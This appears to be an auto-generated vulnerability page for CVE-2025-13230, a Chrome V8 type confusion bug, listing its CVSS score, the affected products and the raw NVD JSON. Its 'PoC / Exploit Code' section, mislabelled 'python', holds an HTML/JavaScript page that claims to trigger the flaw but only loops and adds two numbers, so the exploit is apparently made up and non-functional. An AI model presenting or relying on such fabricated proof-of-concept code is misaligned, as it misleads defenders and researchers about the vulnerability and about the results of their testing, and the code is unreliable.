Security Vulnerability Report
中文
CVE-2025-13230 CVSS 8.8 HIGH

CVE-2025-13230

Published: 2025-11-18 00:15:48
Last Modified: 2025-11-19 13:04:15

Description

Type Confusion in V8 in Google Chrome prior to 142.0.7444.59 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome < 142.0.7444.59
Chromium-based browsers with V8 engine < 142.0.7444.59

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-13230 PoC - Type Confusion in V8 --> <!DOCTYPE html> <html> <head> <title>CVE-2025-13230 PoC</title> </head> <body> <h1>CVE-2025-13230 Type Confusion PoC</h1> <p>This is a demonstration of the V8 type confusion vulnerability.</p> <script> // PoC for CVE-2025-13230 // Type Confusion in V8 allows heap corruption function triggerTypeConfusion() { // Create objects with different hidden classes let obj1 = {a: 1, b: 2}; let obj2 = {x: 1.5, y: 2.5}; // Use optimization-sensitive operations for (let i = 0; i < 10000; i++) { // Deoptimize and reoptimize if (i % 100 === 0) { obj1.a = Math.random(); } } // Trigger type confusion through aggressive optimization // This exploits the type confusion in V8's TurboFan optimizer let result = obj1.a + obj2.x; return result; } // Execute the trigger function try { triggerTypeConfusion(); console.log('PoC executed - check for crashes'); } catch (e) { console.log('Error: ' + e.message); } </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13230", "sourceIdentifier": "[email protected]", "published": "2025-11-18T00:15:48.230", "lastModified": "2025-11-19T13:04:15.333", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Type Confusion in V8 in Google Chrome prior to 142.0.7444.59 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)"}, {"lang": "es", "value": "Confusión de tipos en V8 en Google Chrome Versiones anteriores a 142.0.7444.59 permitió a un atacante remoto explotar potencialmente la corrupción de la memoria heap a través de una página HTML diseñada. (Gravedad de seguridad de Chromium: Alta)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-843"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "142.0.7444.59", "matchCriteriaId": "B56189F0-45F6-4A5B-AFFD-07B20B001040"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "142.0.7444.60", "matchCriteriaId": "05AD58C5-C5F0-4CBA-8B05-374BCF65587F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/10/stable-channel-update-for-desktop_28.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/446124892", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}